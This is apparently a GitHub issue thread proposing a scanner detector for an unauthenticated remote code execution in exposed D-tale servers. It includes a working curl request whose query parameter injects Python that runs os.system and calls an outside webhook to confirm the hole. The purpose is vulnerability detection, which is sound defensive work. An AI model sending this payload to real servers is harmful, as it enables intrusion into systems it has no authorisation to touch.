AI PRP: D-tale Server exposed UI RCE

[VickyTheViking]

According to the D-tale configuration: https://github.com/man-group/dtale/blob/master/docs/CONFIGURATION.md
We can disable authentication, and also have Python as the query engine, which opens the door for Python code injection.

To learn more, visit the detailed report page here: huntr.com bounty details.

[VickyTheViking]

@tooryx, could you please make this my main contribution AI PRP, please?

[tooryx]

Hi @VickyTheViking,

Would you be willing to write it using the templated format?

~tooryx

[VickyTheViking]

Hii @tooryx
I just successfully tested the vulnerability, and it only needs GET requests, plus out-of-band network requests.

We need to URL decode the query parameter in the HTTP request we want to send:

curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://yourWebhook.com/some%20%23%22%22%22%29'

We need to only put our callback URL instead of the https://yourWebhook.com/some part.

[tooryx]

There is currently no encoding/decoding capabilities in the templated format.
Is the vulnerability reflective (e.g. you can trigger something to be ouput)?

Otherwise, if the only relevant part modified is the URL, you might be able to just prebuild the request with {{ T_CBS_URI }}.

Can you confirm that this seems feasible? Then I will accept this request.

~tooryx

[VickyTheViking]

@tooryx Yes we can do this with {{ T_CBS_URI }}.